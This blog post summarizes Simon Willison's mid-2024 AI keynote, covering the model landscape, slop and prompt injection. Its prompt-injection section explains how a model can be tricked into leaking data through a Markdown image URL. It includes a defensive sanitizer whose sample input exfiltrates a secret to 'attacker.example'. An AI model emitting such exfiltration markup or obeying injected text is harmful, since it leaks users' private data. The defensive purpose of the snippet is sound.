The AI Landscape: Mid-2024
As I wrote in my previous post, I follow Simon Willison closely because he is one of the most knowledgeable people working in the realm of Large Language Models (LLMs) and AI.
Most importantly, Simon actually works with and tests LLMs. He doesn't speculate about how many more billions of dollars the AI market will grow this week, or whether AI will be the downfall of humankind. In the words of Paul Everett, Simon gets the story straight. I am admittedly biased, since Simon is a member of our Python community.
So it was with great interest that I read his blog post on his keynote for the AI Engineer World's Fair. It's a long post, packed with his views on the breakthroughs and challenges currently happening in the LLM and AI space, so I've distilled and summarized it for my readers, who are mostly in business-related roles and less technically inclined.
You Have Options Other Than GPT-4 Now
When OpenAI released GPT-4 on March 14, 2023, it quickly became the gold standard for language models. For nearly a year, no other model could rival its performance, raising concerns about a monopoly on AI model quality and fears of stagnation. But the landscape has changed dramatically in the past few months: new models have emerged, breaking the GPT-4 barrier and ushering in a new era of competition and innovation.
The New Landscape of Models
Today, we see three distinct clusters of models:
- The top-tier models, including GPT-4o, Claude 3.5 Sonnet, and Google Gemini 1.5 Pro, offer cutting-edge performance at competitive prices.
- Meanwhile, more affordable yet highly capable models like Claude 3 Haiku and Google Gemini 1.5 Flash provide viable alternatives for budget-conscious projects.
- However, models like GPT-3.5 Turbo have become obsolete, highlighting the rapid pace of technological advancement.
Simon was pretty specific in his talk: do NOT use GPT-3.5 Turbo anymore. In his own words, it's "hot garbage." (I have never seen hot garbage before. Have you?)
Evaluating Model Vibes
Having a bunch of new models to try out is fun, but how do you know which one is best?
"Vibes" is a term Simon frequently uses when he wants to evaluate LLMs.
Performance metrics alone do not paint the full picture. The "vibes" of a model, or how well it aligns with the intended tasks, are equally important. Simon highlighted the LMSYS Chatbot Arena, a platform where users can compare models based on their "vibes" through head-to-head prompts. This user-driven evaluation method has proven invaluable in determining the practical usability of different models, with GPT-4o and Claude 3.5 Sonnet currently leading the pack.
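You can run a small vibe check of your own, too. Here is a minimal sketch, assuming you have the official `openai` and `anthropic` Python packages installed and API keys for both services set in your environment, that sends the same prompt to GPT-4o and Claude 3.5 Sonnet so you can compare the answers side by side:

```python
# A tiny head-to-head "vibe check": one prompt, two models, eyeball the
# answers. Assumes OPENAI_API_KEY and ANTHROPIC_API_KEY are set.
from openai import OpenAI
import anthropic

prompt = "Explain prompt injection to a non-technical manager in three sentences."

# GPT-4o via the OpenAI SDK
gpt = OpenAI().chat.completions.create(
    model="gpt-4o",
    messages=[{"role": "user", "content": prompt}],
)
print("GPT-4o:\n", gpt.choices[0].message.content)

# Claude 3.5 Sonnet via the Anthropic SDK
claude = anthropic.Anthropic().messages.create(
    model="claude-3-5-sonnet-20240620",
    max_tokens=300,
    messages=[{"role": "user", "content": prompt}],
)
print("\nClaude 3.5 Sonnet:\n", claude.content[0].text)
```

The Chatbot Arena does essentially this at scale, with anonymized models and crowd-sourced votes; the point of the toy script is that vibe-testing is cheap enough to do yourself.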
The Rise of Openly Licensed and Free-to-Access Models
Openly licensed models are making significant strides, with new entrants like Meta's Llama 3 and Cohere's Command R+ offering impressive capabilities. These models democratize access to high-quality AI, allowing more developers to experiment and innovate without the constraints of proprietary systems. This shift is fostering a more diverse and competitive AI ecosystem.
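To make "democratized access" concrete: an openly licensed model like Llama 3 can run entirely on your own machine. Here is a minimal sketch using the Ollama Python client, assuming you have installed Ollama and pulled the model with `ollama pull llama3`:

```python
# Querying a locally running, openly licensed model (Llama 3) through
# Ollama's Python client. No API key needed; no data leaves your machine.
# Assumes Ollama is installed and `ollama pull llama3` has been run.
import ollama

response = ollama.chat(
    model="llama3",
    messages=[{"role": "user", "content": "What is an LLM? One sentence."}],
)
print(response["message"]["content"])
```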
Free Access to GPT-4 Class Models
One of the most exciting developments is the availability of GPT-4 class models for free. Both GPT-4o and Claude 3.5 Sonnet are now accessible to consumers without cost, provided they sign in. This democratization of cutting-edge AI technology allows a broader audience to experience and leverage the power of these advanced models.
Challenges in Using AI Tools
Despite these advancements, using AI tools effectively remains a complex task. Simon emphasized the challenges associated with tools like ChatGPT, particularly when dealing with diverse inputs like PDFs. The intricacies of processing and interpreting different types of data highlight the need for advanced technical skills and experience to unlock the full potential of these tools.
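To make that concrete: with PDFs, one common workaround is to extract the text yourself before handing it to the model, rather than trusting a chat tool's opaque built-in file handling. A minimal sketch using the `pypdf` package (the file name is a placeholder):

```python
# Extract plain text from a PDF ourselves before sending it to an LLM,
# instead of relying on a chat tool's built-in file handling.
# Requires: pip install pypdf  ("example.pdf" is a placeholder name)
from pypdf import PdfReader

reader = PdfReader("example.pdf")
text = "\n".join(page.extract_text() or "" for page in reader.pages)

# Scanned PDFs often contain no extractable text layer; flag that case
# rather than silently sending an empty document to the model.
if not text.strip():
    raise ValueError("No text layer found; this PDF may need OCR first.")

print(text[:500])  # sanity-check what the model will actually see
```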
The "AI Trust Crisis"
Trust is a significant issue in the AI industry. Recent incidents involving Dropbox and Slack have exacerbated user concerns about data privacy and AI usage. Misleading communication and poor design have led to widespread distrust, even when companies like Anthropic explicitly state they do not use customer data for training. Rebuilding trust will require transparency, clear communication, and robust privacy practices.
The Persistent Threat of Prompt Injection
Prompt injection remains a critical vulnerability in AI systems. Simon's talk underscored the ongoing challenges posed by this issue, with examples like the Markdown image exfiltration bug demonstrating the potential for data breaches. Understanding and mitigating prompt injection is crucial for maintaining the security and integrity of AI applications.
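The Markdown image bug works because a model can be tricked into emitting an image whose URL smuggles private data out to an attacker's server when it is rendered. One narrow, illustrative mitigation (not a general fix for prompt injection, which remains unsolved) is to strip or allowlist image URLs in model output before rendering it. A sketch, with a hypothetical allowlist:

```python
# One narrow mitigation for the Markdown image exfiltration bug:
# strip Markdown images from untrusted model output unless the image
# host is on an explicit allowlist. This does NOT solve prompt
# injection in general; it only closes this one exfiltration channel.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"example-cdn.com"}  # hypothetical trusted hosts

IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    def replace(match: re.Match) -> str:
        alt_text, url = match.group(1), match.group(2)
        if urlparse(url).hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep images from trusted hosts
        return alt_text  # drop the image, keep only its alt text
    return IMAGE_PATTERN.sub(replace, markdown)

# An injected instruction tries to exfiltrate data via the image URL:
evil = "Here you go! ![data](https://attacker.example/?secret=hunter2)"
print(strip_untrusted_images(evil))  # -> "Here you go! data"
```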
Avoiding the Slop of AI Content
You know what "spam" is, right? Well, we now have "slop."
Simon introduced the concept of "slop"—AI-generated content that is both unrequested and unreviewed. Publishing such content can harm the credibility of AI systems and the individuals or organizations behind them. AI engineers must take accountability for the content they produce, ensuring it is accurate, reliable, and valuable.
We've made it a point for our product Kafkai to include an editorial step rather than auto-publish functionality, even though some customers have asked for it.
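As a tiny illustration of what that editorial step looks like in principle (a generic sketch, not Kafkai's actual code): generated drafts are held in a queue, and nothing goes live without an explicit human approval.

```python
# A generic human-in-the-loop publishing gate (an illustrative sketch,
# not Kafkai's actual implementation): AI-generated drafts are held
# for review and can only go live after a named editor approves them.
from dataclasses import dataclass

@dataclass
class Draft:
    title: str
    body: str
    approved_by: str | None = None  # set only by a human editor

def publish(draft: Draft) -> None:
    if draft.approved_by is None:
        raise PermissionError("Refusing to auto-publish unreviewed AI content.")
    print(f"Published '{draft.title}' (approved by {draft.approved_by})")

draft = Draft(title="AI Landscape Recap", body="...generated text...")
draft.approved_by = "jane@example.com"  # the mandatory editorial step
publish(draft)
```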
Our Responsibilities as AI Engineers
Finally, Simon left a message at the end of his keynote: As AI engineers, we are at the forefront of this technological revolution. It is our responsibility to establish best practices for using AI tools responsibly and to guide others in understanding their capabilities and limitations. By setting a positive example and sharing our knowledge, we can help ensure that AI technology is used to benefit society as a whole.
Simon Willison's keynote provides a comprehensive overview of the current state of AI and the challenges that lie ahead. As we navigate this exciting yet complex landscape, it is crucial to remain vigilant, responsible, and innovative.